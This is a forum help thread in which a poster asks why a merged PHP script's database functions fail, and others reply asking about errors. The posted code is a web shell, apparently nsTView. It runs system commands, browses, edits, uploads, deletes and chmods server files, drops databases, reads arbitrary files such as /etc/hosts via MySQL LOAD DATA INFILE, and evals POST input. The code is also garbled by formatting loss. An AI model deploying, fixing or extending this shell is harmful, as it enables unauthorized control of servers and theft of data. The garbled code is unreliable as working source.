File manager help

Hi. I tried to join 2 scripts ? filemanager and MySQL editor. I use the switch construction as menu. Both scripts work well as a standalone scripts, but when I joined them, the MySQL editor doesn?t work properly ? the option ?delete database?, ?Insert row?, ?Edit row? and ?Update? don?t work. Can somebody tell me where is the problem?

This is the joined script:
error_reporting(E_ALL & ~E_NOTICE);

use password true / false

$create_password = true;
$password = “pass”; // default password


else $ip = $_SERVER[‘REMOTE_ADDR’];


if(!isset($_SESSION[‘nst’]) or $_SESSION[‘nst’]!=$password){

Login to use
Login to use
Host: ".$_SERVER["HTTP_HOST"]."
IP: ".gethostbyname($_SERVER["HTTP_HOST"])."
Your ip: ".$ip."


print "File Manager

BODY, TD, TR { background-color: #C0C0C0; text-decoration: none; font-family: Verdana; font-size: 8pt; SCROLLBAR-FACE-COLOR: #363d4e; SCROLLBAR-HIGHLIGHT-COLOR: #363d4e; SCROLLBAR-SHADOW-COLOR: #363d4e; SCROLLBAR-ARROW-COLOR: #363d4e; SCROLLBAR-TRACK-COLOR: #808080 } input, textarea, select { font-family: Verdana; font-size: 10px; color: black; background-color: white; border: solid 2px; border-color: #808080 } UNKNOWN { COLOR: #0006DE; TEXT-DECORATION: none } A:link { COLOR: #0006DE; TEXT-DECORATION: none } A:hover { COLOR: #FF0C0B; TEXT-DECORATION: none } A:active { COLOR: #0006DE; TEXT-DECORATION: none } A:visited { TEXT-DECORATION: none }


echo “”;

if($os==“unix”){ echo "

id: ".@exec('id')." uname -a: ".@exec('uname -a')."";} print "
"; echo"
Your IP: [$ip] Server IP: [".gethostbyname($_SERVER["HTTP_HOST"])."] Server Hostdomain: [".$_SERVER["HTTP_HOST"]."]
[Safe mode: $safe_m] [Register globals: $reg_g]

[● Back] [● Navigation] [● MySQL]


if (!empty($_GET[‘ac’])) {$ac = $_GET[‘ac’];}
elseif (!empty($_POST[‘ac’])) {$ac = $_POST[‘ac’];}
else {$ac = “navigation”;}

switch($ac) {

case “sql”:
//echo (“SQL”);
$f = “sql_dump.txt”;
$f_d = $_GET[‘f_d’];


function adds($editf){
return $editf;

function adds2($editf){
return $editf;


<? if(!@$conn){ ?> <?}?>
<? if(@$conn){ echo "PHP v".@phpversion()."
mySQL v".@mysql_get_server_info()."
<? $ac = 'sql'; if($conn){ $serv = @mysql_connect($adress.":".$port, $login,$pass) or die("Error: ".mysql_error().""); if($serv){$status="Connected. :: Log out";}else{$status="Disconnected.";} print "Status: $status

"; print "
"; print "
"; print ""; $res = mysql_list_dbs($serv); while ($str=mysql_fetch_row($res)){ print "[DEL][DUMP] $str[0]
"; $tc++; } $baza=$_GET['baza']; $db=$_GET['db']; print "[Total db: $tc]
"; if($baza){ print "
db: [$db]

"; $result=@mysql_list_tables($db); while($str=@mysql_fetch_array($result)){ $c=mysql_query ("SELECT COUNT(*) FROM $str[0]"); $records=mysql_fetch_array($c); if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);} if($records[0]=="0"){ print "[D][R][$records[0]] $str[0]
"; }else{ print "[D][R][$records[0]] $str[0]
"; } mysql_free_result($c); $total_t++; } print "
Total tables: $total_t"; print "
for($i=0; $i<$s4ot+10; $i++){print " ";}
                                print "
"; } #end baza # delete table if(isset($delete_table)){ mysql_select_db($_GET['db']) or die("".mysql_error().""); mysql_query("DROP TABLE IF EXISTS $delete_table") or die("".mysql_error().""); print "
Table [ $delete_table ] :: Deleted successfuly!"; print ""; } # end of delete table # delete database if(isset($_GET['delete_db'])){ mysql_drop_db($_GET['delete_db']) or die("".mysql_error().""); print "
Database ".$_GET['delete_db']." :: Deleted Successfuly!"; print ""; } # end of delete database // delete row if(isset($_POST['delete_row'])){ $_POST['delete_row'] = base64_decode($_POST['delete_row']); mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("".mysql_error().""); $del_result = "
Deleted successfuly!
".$_POST['delete_row']; print ""; } // end of delete row $vn=$_GET['vn']; print "
"; print "Database: $db => $vn"; // edit row if(isset($_POST['edit_row'])){ $edit_row=base64_decode($_POST['edit_row']); $r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("".mysql_error().""); print "

"; print ""; print ""; print " Update
Insert new

"; $i=0; while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){ foreach($mn as $key =>$val){ $type = mysql_field_type($r_edit, $i); $len = mysql_field_len($r_edit, $i); $del .= "`$key`='".adds($val)."' AND "; $c=strlen($val); $val=htmlspecialchars($val, ENT_NOQUOTES); $str=" $val "; $buff .= ""; $i++; } } $delstring=base64_encode($del); print ""; print "$buff
Row Value

"; print "
"; if(!$_POST['makeupdate']){print "";} if($_POST['makeupdate']){ if($_POST['upd']=='update'){ preg_match_all("/name='(.*?)'scols=39srows=5>(.*?)/i",$buff,$matches3); $delstring=$_POST['delstring']; $delstring=base64_decode($delstring); $delstring = substr($delstring, 0, strlen($delstring)-5); for($i=0; $i<count($matches3[0]); $i++){ eval("$".$matches3[1][$i]." = "".adds2($_POST[$matches3[1][$i]])."";"); $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',"; } $total_str = substr_replace($total_str,"",-1); $up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring"; $up_string = htmlspecialchars($up_string, ENT_NOQUOTES); print "PHP var:

"; print ""; mysql_query($up_string) or die("".mysql_error().""); }#end of make update if($_POST['upd']=='insert'){ preg_match_all("/name='(.*?)'scols=39srows=5>(.*?)/i",$buff,$matches3); $delstring=$_POST['delstring']; $delstring=base64_decode($delstring); $delstring = substr($delstring, 0, strlen($delstring)-5); for($i=0; $i<count($matches3[0]); $i++){ eval("$".$matches3[1][$i]." = "".adds2($_POST[$matches3[1][$i]])."";"); $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,"; } $total_str = ",,".$total_str; preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4); for($i=0; $i<count($matches4[1]); $i++){ $matches4[1][0]=str_replace(",","",$matches4[1][0]); $total_m_i .= "`".$matches4[1][$i]."`,"; $total_m_x .= "'".$matches4[2][$i]."',"; } $total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1); $total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1); $make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)"; mysql_query($make_insert) or die("".mysql_error().""); print "PHP var:

"; print ""; }#end of insert }#end of update } // end of edit row // insert new line if($_GET['ins_new_line']){ $qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("".mysql_error().""); print " Insert new line in $tbl table

"; print ""; while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) { foreach ($new_line as $key =>$next) { $buff .= "$next "; } $expl=explode(" ",$buff); $buff2 .= $expl[0]." "; print ""; unset($buff); } print "
"; if($_POST['mk_ins']){ preg_match_all("/(.*?)s/i",$buff2,$matches3); for($i=0; $i<count($matches3[0]); $i++){ eval("$".$matches3[1][$i]." = "".adds2($_POST[$matches3[1][$i]])."";"); $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,"; } $total_str = ",,".$total_str; preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4); for($i=0; $i<count($matches4[1]); $i++){ $matches4[1][0]=str_replace(",","",$matches4[1][0]); $total_m_i .= "`".$matches4[1][$i]."`,"; $total_m_x .= "'".$matches4[2][$i]."',"; } $total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1); $total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1); $make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)"; mysql_query($make_insert) or die("".mysql_error().""); print "PHP var:

"; print ""; }#end of mk ins } //end of ins new line //rename table if(isset($_GET['rename_table'])){ $rename_table=$_GET['rename_table']; print "

Rename $rename_table to

"; if(isset($_POST['new_name'])){ mysql_select_db($db) or die("".mysql_error().""); mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("".mysql_error().""); print "
Table $rename_table renamed to ".$_POST['new_name'].""; print ""; } } //end of rename // dump table if($_GET['dump']){ if(!is_writable($f_d)){die("

This folder $f_d isnt writable!
Cannot make dump.

You can change temp folder for dump file in your browser!
Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)
Then press enter
");} mysql_select_db($db) or die("".mysql_error().""); $fp = fopen($f_d."/".$f,"w"); fwrite($fp, "# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") # MySQL version: ".mysql_get_server_info()." # PHP version: ".phpversion()." # Date: ".date("d.m.Y - H:i:s")." # Dump db ( $db ) Table ( $tbl ) # --- eof --- "); $que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("".mysql_error().""); $row = mysql_fetch_row($que); fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;rn"); $row[1]=str_replace("n","rn",$row[1]); fwrite($fp, $row[1].";rnrn"); $que = mysql_query("SELECT * FROM `$tbl`"); if(mysql_num_rows($que)>0){ while($row = mysql_fetch_assoc($que)){ $keys = join("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = adds2($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');rn"; fwrite($fp, $sql); } } fclose($fp); print ""; } //end of dump // db dump if($_GET['dump_db']){ $c=mysql_num_rows(mysql_list_tables($db)); if($c>=1){ print "

   Dump database $db"; }else{ print "

Cannot dump database. No tables exists in $db db."; die; } if(sizeof($tabs)==0){ $res = mysql_query("SHOW TABLES FROM $db"); if(mysql_num_rows($res)>0){ while($row=mysql_fetch_row($res)){ $tabs[] .= $row[0]; } } } $fp = fopen($f_d."/".$f,"w"); fwrite($fp, "# nsTView.php v$ver # Web: # Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") # MySQL version: ".mysql_get_server_info()." # PHP version: ".phpversion()." # Date: ".date("d.m.Y - H:i:s")." # Dump db ( $db ) # --- eof --- "); foreach($tabs as $tab) { fwrite($fp,"DROP TABLE IF EXISTS `$tab`;rn"); $res = mysql_query("SHOW CREATE TABLE `$tab`"); $row = mysql_fetch_row($res); $row[1]=str_replace("n","rn",$row[1]); fwrite($fp, $row[1].";rnrn"); $res = mysql_query("SELECT * FROM `$tab`"); if(mysql_num_rows($res)>0){ while($row=mysql_fetch_assoc($res)){ $keys = join("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = adds2($v);} $values = join("', '", $values); $sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');rn"; fwrite($fp, $sql); }} fwrite($fp, "rnrnrn"); } fclose($fp); print ""; } //end of db dump $vnutr=$_GET['vnutr']; $tbl=$_GET['tbl']; if($vnutr and !$_GET['ins_new_line']){ print "
"; mysql_select_db($db) or die(mysql_error()); $c=mysql_query ("SELECT COUNT(*) FROM $tbl"); $cfa=mysql_fetch_array($c); mysql_free_result($c); print " Total: $cfa[0] From: To: [DOWNLOAD] [INSERT] [DUMP]
"; $vn=$_GET['vn']; $from=$_GET['from']; $to=$_GET['to']; $from=$_GET['from']; $to=$_GET['to']; if(!isset($from)){$from=0;} if(!isset($to)){$to=50;} $query = "SELECT * FROM $vn LIMIT $from,$to"; $result = mysql_query($query); $result1= mysql_query($query); print $del_result; print ""; for ($i=0;$i<mysql_num_fields($result);$i++){ $name=mysql_field_name($result,$i); $type = mysql_field_type($result, $i); $len = mysql_field_len($result, $i); print ""; } print "

while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
foreach($mn as $key=>$inside){
$buffer1 .= "`$key`='".adds($inside)."' AND ";
$b1 .= "
"; } $buffer1 = substr($buffer1, 0, strlen($buffer1)-5); $buffer1 = base64_encode($buffer1); print "rn"; print $b1; print ""; unset($b1); unset($buffer1); } mysql_free_result($result); print "
$name ($type($len))
".htmlspecialchars($inside, ENT_NOQUOTES)." 
"; } #end vnutr print "
"; } # end $conn print "
"; die; if($_GET['dump_download']){ header("Content-disposition: attachment; filename="$f";"); header("Content-length: ".filesize($f_d."/".$f)); header("Expires: 0"); readfile($f_d."/".$f); if(is_writable($f_d."/".$f)){ unlink($f_d."/".$f); } die; } break; //END SQL case "navigation": //START NAVIGATION $images=array(".gif",".jpg",".png",".bmp",".jpeg"); $whereme=getcwd(); @$d=@$_GET['d']; $php_self=@$_SERVER['PHP_SELF']; if(@eregi("/",$whereme)){$os="unix";}else{$os="win";} if(!isset($d)){$d=$whereme;} $d=str_replace("\","/",$d); if(@$_GET['img']=="1"){ @$e=$_GET['e']; header("Content-type: image/gif"); readfile("$d/$e"); } if(@$_GET['getdb']=="1"){ header('Content-type: application/plain-text'); header('Content-Disposition: attachment; filename=nst-mysql-damp.htm'); } print "Navigation BODY, TD, TR { background-color: #C0C0C0; text-decoration: none; font-family: Verdana; font-size: 10pt; SCROLLBAR-FACE-COLOR: #363d4e; SCROLLBAR-HIGHLIGHT-COLOR: #363d4e; SCROLLBAR-SHADOW-COLOR: #363d4e; SCROLLBAR-ARROW-COLOR: #363d4e; SCROLLBAR-TRACK-COLOR: #808080 } input, textarea, select { font-family: Verdana; font-size: 10px; color: black; background-color: white; border: solid 2px; border-color: #808080 } UNKNOWN { COLOR: #0006DE; TEXT-DECORATION: none } A:link { COLOR: #0006DE; TEXT-DECORATION: none } A:hover { COLOR: #FF0C0B; TEXT-DECORATION: none } A:active { COLOR: #0006DE; TEXT-DECORATION: none } A:visited { TEXT-DECORATION: none } "; print " "; echo"
0"; $expl=explode("/",$d); $coun=count($expl); if($os=="unix"){echo "
";} else{ echo "$expl[0]/";} for($i=1; $i<$coun; $i++){ @$xx.=$expl[$i]."/"; $sls="$expl[$i]/"; $sls=str_replace("//","/",$sls); $sls=str_replace("/'>/","/'>",$sls); print $sls; } $mkdir=$_GET['mkdir']; if($mkdir){ print "
Create Folder in $d :

New folder name:

"; if($_POST['dir_n']){ mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']); print "Directory created successfuly!
You will be redirected in a few seconds."; } die; } $mkfile=$_GET['mkfile']; if($mkfile){ print "
Create file in $d :

File name:

"; if($_POST['file_n']){ $fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']); fwrite($fp,""); print "File created successfuly!
You will be redirected in a few seconds."; } die; } $read_file_safe_mode=$_GET['read_file_safe_mode']; if($read_file_safe_mode){ if(!isset($_POST['l'])){$_POST['l']="root";} print "
Read file content using MySQL - when safe_mode, open_basedir is ON
(example: /etc/hosts)

"; if($_POST['read_file']){ $read_file=$_POST['read_file']; @mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("".mysql_error().""); mysql_create_db("tmp_bd_file") or die("".mysql_error().""); mysql_select_db("tmp_bd_file") or die("".mysql_error().""); mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("".mysql_error().""); mysql_query("LOAD DATA INFILE "".addslashes($read_file)."" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query) or die("".mysql_error().""); print "File content:

"; for($i=0;$i$col_value) { print htmlspecialchars($col_value)."
";}} mysql_free_result($result); mysql_drop_db("tmp_bd_file") or die("".mysql_error().""); } die; }#end of read_file_safe_mode # sys $wich_f=$_GET['wich_f']; $delete=$_GET['delete']; $del_f=$_GET['del_f']; $chmod=$_GET['chmod']; $ccopy_to=$_GET['ccopy_to']; // delete file if(@$_GET['del_f']){ if(!isset($delete)){ print "Delete this file?

Yes / No ";} if($delete==1){ unlink($d."/".$del_f); print "File: $d/$del_f DELETED!

You will be redirected i a few seconds.

# BACK "; } exit; } // Copy file to if($ccopy_to){ $wich_f=$_POST['wich_f']; $to_f=$_POST['to_f']; print "Copy file:



"; if($to_f){ @copy($wich_f,$to_f) or die("Cannot copy!!! maybe folder is not writable"); print "Copy success!!!
"; } exit; } //Set Permissions if(@$_GET['chmod']){ $perms = @fileperms($d."/".$wich_f); print "CHMOD file $d/$wich_f

This file chmod is
"; print perm($perms); print "
"; $chmd=<<<HTML
CHMOD (File Permissions)
Permission Owner Group Other
Octal: =
Symbolic: =
HTML; print "".$chmd." $d/$wich_f

"; $t_total=$_POST['t_total']; if($t_total){ chmod($d."/".$wich_f,$t_total); print "
Now chmod is $t_total

"; print "# BACK

"; } exit; } # rename if(@$_GET['rename']){ print "RENAME $d/$wich_f ?



"; @$rto=$_POST['rto']; if($rto){ $fr1=$d."/".$wich_f; $fr1=str_replace("//","/",$fr1); $to1=$d."/".$rto; $to1=str_replace("//","/",$to1); rename($fr1,$to1); print "File
Renamed to $rto

"; echo ""; } exit; } if(@$_GET['yes']=="yes"){ $d=@$_GET['d']; $e=@$_GET['e']; unlink($d."/".$e); $delresult="Success $d/$e deleted "; } if(@$_GET['clean']=="1"){ @$e=$_GET['e']; $x=fopen("$d/$e","w"); fwrite($x,""); echo ""; exit; } if(@$_GET['e']){ $d=@$_GET['d']; $e=@$_GET['e']; $pinf=pathinfo($e); if(in_array(".".@$pinf['extension'],$images)){ echo ""; exit;} $filename="$d/$e"; $fd = @fopen ($filename, "r"); $c = @fread ($fd, @filesize ($filename)); $c=htmlspecialchars($c); $de=$d."/".$e; $de=str_replace("//","/",$de); if(is_file($de)){ if(!is_writable($de)){echo "READ ONLY
";}} echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
"; echo " File contents:

"; if(@$_GET['delete']=="1"){ $delete=$_GET['delete']; echo " DELETE: Are you sure?
Yes || No
"; if(@$_GET['yes']=="yes"){ @$d=$_GET['d']; @$e=$_GET['e']; echo $delresult; } if(@$_GET['no']){ echo " "; } } #end of delete exit; } #end of e if(@$_GET['edit']=="1"){ @$d=$_GET['d']; @$ef=$_GET['ef']; $e=$ef; if(is_file($d."/".$ef)){ if(!is_writable($d."/".$ef)){echo "READ ONLY
";}} echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
"; $filename="$d/$ef"; $fd = @fopen ($filename, "r"); $c = @fread ($fd, @filesize ($filename)); $c=htmlspecialchars($c); $de=$d."/".$ef; $de=str_replace("//","/",$de); echo " Edit:
"; if(!@$_POST['save']){ print " $c

"; } if(@$_POST['save']){ $editf=@$_POST['editf']; if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){ $editf=stripslashes($editf); } $f=fopen($filename,"w+"); fwrite($f,"$editf"); echo "
File edited. "; exit; } exit; } print "

CREATE NEW:  * Folder *     * File *

Read file if safe mode is On
File upload:* Mass upload *

"; $dirs=array(); $files=array(); $dh = @opendir($d) or die("
Filename Options Size Owner/Group Permissions
Permission Denied or Folder/Disk does not exist
"); while (!(($file = readdir($dh)) === false)) { if ($file=="." || $file=="..") continue; if (@is_dir("$d/$file")) { $dirs[]=$file; }else{ $files[]=$file; } sort($dirs); sort($files); $fz=@filesize("$d/$file"); } function perm($perms){ if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } for($i=0; $i<count($dirs); $i++){ $perms = @fileperms($d."/".$dirs[$i]); $owner = @fileowner($d."/".$dirs[$i]); if($os=="unix"){ $fileownera=posix_getpwuid($owner); $owner=$fileownera['name']; } $group = @filegroup($d."/".$dirs[$i]); if($os=="unix"){ $groupinfo = posix_getgrgid($group); $group=$groupinfo['name']; } $info=perm($perms); if($i%2){$color="#C0C0C0";}else{$color="#D1D1D1";} $linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>"; $linkd=str_replace("//","/",$linkd); echo " 0 $linkd DIR   $owner/$group $info "; } for($i=0; $i<count($files); $i++){ $size=@filesize($d."/".$files[$i]); $perms = @fileperms($d."/".$files[$i]); $owner = @fileowner($d."/".$files[$i]); if($os=="unix"){ $fileownera=posix_getpwuid($owner); $owner=$fileownera['name']; } $group = @filegroup($d."/".$files[$i]); if($os=="unix"){ $groupinfo = posix_getgrgid($group); $group=$groupinfo['name']; } $info=perm($perms); if($i%2){$color="#D1D1D1";}else{$color="#C0C0C0";} if ($size < 1024){$siz=$size.' b'; }else{ if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{ if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{ if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';} }}} echo " 2 $files[$i] [options]
$siz $owner/$group $info "; } echo " "; if(@$_POST['uploadf']){ $where=$_POST['where']; $newf=$_POST['newf']; $where=str_replace("//","/",$where); if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;} $uploadfile = "$where/".$newf; if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) { $uploadfile=str_replace("//","/",$uploadfile); echo "
Uploaded to $uploadfile

"; }else{ echo "

";} } if($_GET['download']){ $download=$_GET['download']; header("Content-disposition: attachment; filename="$download";"); readfile("$d/$download"); exit;} break; //END NAVIGATION case "massupload": if(@$_GET['t']=="massupload"){ echo " Mass upload:

"; if(@$_POST['massupload']){ $where=@$_POST['where']; $uploadfile1 = "$where/".@$_FILES['text1']['name']; $uploadfile2 = "$where/".@$_FILES['text2']['name']; $uploadfile3 = "$where/".@$_FILES['text3']['name']; $uploadfile4 = "$where/".@$_FILES['text4']['name']; $uploadfile5 = "$where/".@$_FILES['text5']['name']; $uploadfile6 = "$where/".@$_FILES['text6']['name']; $uploadfile7 = "$where/".@$_FILES['text7']['name']; $uploadfile8 = "$where/".@$_FILES['text8']['name']; $uploadfile9 = "$where/".@$_FILES['text9']['name']; $uploadfile10 = "$where/".@$_FILES['text10']['name']; if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { $where=str_replace("\\","\",$where); echo "Uploaded to $uploadfile1
";} if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { $where=str_replace("\\","\",$where); echo "Uploaded to $uploadfile2
";} if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { $where=str_replace("\\","\",$where); echo "Uploaded to $uploadfile3
";} if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { $where=str_replace("\\","\",$where); echo "Uploaded to $uploadfile4
";} if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { $where=str_replace("\\","\",$where); echo "Uploaded to $uploadfile5
";} if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { $where=str_replace("\\","\",$where); echo "Uploaded to $uploadfile6
";} if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { $where=str_replace("\\","\",$where); echo "Uploaded to $uploadfile7
";} if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { $where=str_replace("\\","\",$where); echo "Uploaded to $uploadfile8
";} if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { $where=str_replace("\\","\",$where); echo "Uploaded to $uploadfile9
";} if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { $where=str_replace("\\","\",$where); echo "Uploaded to $uploadfile20
";} } exit;} break; } ?>[/php]

What is the application doing or not doing that it isn’t or is supposed to be.

Do you get any errors? Did you create these scripts?

Originally, as a standalone file, every option of the MySQL editor worked fine. When I joined to the filemanager (without to change the original code of the editor), the options to delete database, to edit and insert a row stopped to work. i just can log in the MySQL server and to browse the records. I wonder why is that, becouse I just copied the source of the MySQL editor and pasted it between

switch($ac) {
case “sql”:



without to edit the original code.

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